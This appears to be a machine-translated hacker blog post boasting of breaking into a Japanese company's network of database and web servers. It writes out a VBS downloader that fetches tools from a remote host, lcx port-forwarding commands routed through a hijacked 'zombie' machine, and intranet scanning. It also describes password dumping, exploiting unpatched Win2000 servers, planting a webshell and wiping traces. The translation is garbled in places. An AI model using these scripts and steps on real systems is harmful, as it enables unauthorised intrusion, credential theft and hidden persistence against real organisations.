Because of this situation, penetration can obtain the permissions of the entire server group, N servers. So I wrote an article with little vanity.
Start:
The starting point is an injection point: sa, Intranet, and a vbs script, lcx, and forwarding port.
The following is a reference clip: Down. vbs ILocal=LCase(WScript.Arguments(1)) IRemote=LCase(WScript.Arguments(0)) Set xPost=CreateObject("Microsoft. XMLHTTP") XPost.Open"GET",IRemote,0 XPost.Send() Set sGet=CreateObject("ADODB. Stream") SGet.Mode=3 SGet.Type=1 SGet.Open() SGet.Write(XPost.ResponseBody) SGet.SaveToFile iLocal,2 Use: cscript down. vbs http: // ip/lcx.exe (the path is under system32 by default) |
This download script can be used repeatedly without exposing the address of my storage tool. Some download scripts are written in it, which is not very good .)
The local connection to the Japanese network is slow. Two VPNs are connected and then mounted to a zombie in Japan. I think the speed will not be bad. ps: The Role of bots is shown ).
Added users. On the broiler terminal: lcx-listen 520 1982, the target machine is lcx-slave myip 520 127.0.0.1 3389.
OK. enter 127.0.0.1: 1982 in the terminal to log on successfully.
Medium Disk:
Win2000 system, mssql server
First, capture the system password and find the SQL password. Check some information, and check whether there are any backdoors in the same industry. Clear them.
Analyzed the password: (number + machine name + number)
Others are not quite clear about birds. Contains several basic tools to put a hidden directory.
Ps: Generally, you have to clean up after entering. It is best not to plant horses. Fast and easy to expose.
At this time, we figured out how to obtain the web permissions. Analyzes the network topology)
First look at the network neighbors:
Workgroup
C ** SQL2006
B **-DB
B *** TENDB
....
Obviously, they are all database servers.
Another working group is found at the top layer:
Web-k. **. jp
C *** oo_db
...
Ah, it's still a database server.
Ipconfig/all
192.168.10.18 only has one Intranet ip address.
OK: s tcp 192.168.10.1 192.168.10.254 80 20/save
Use s to scan the internal network to open 80 hosts and set the thread to 20, so you should be precise.
Unfortunately, the database servers are used as the database servers, and there is no website on them.
I am wondering, where is the web server running?
Close:
After a while, I carefully analyzed the network topology. Finally, let me find:
192.168.1.1-255 This section is a web server group
Next, use s to scan a piece. Corresponding to the Internet ip address, select the starting object of overflow 192.168.1.19) slaves like the antique win2000, a lot of patches are incomplete, so overflow is good)
Very comfortable, and then put a webshell in a remote corner of the web directory. Wipe your ass and leave.
Ps: the figure is taken when I overflow another database server.
- Coho Linux and Japanese NEC servers work closely together
- The future of IPTV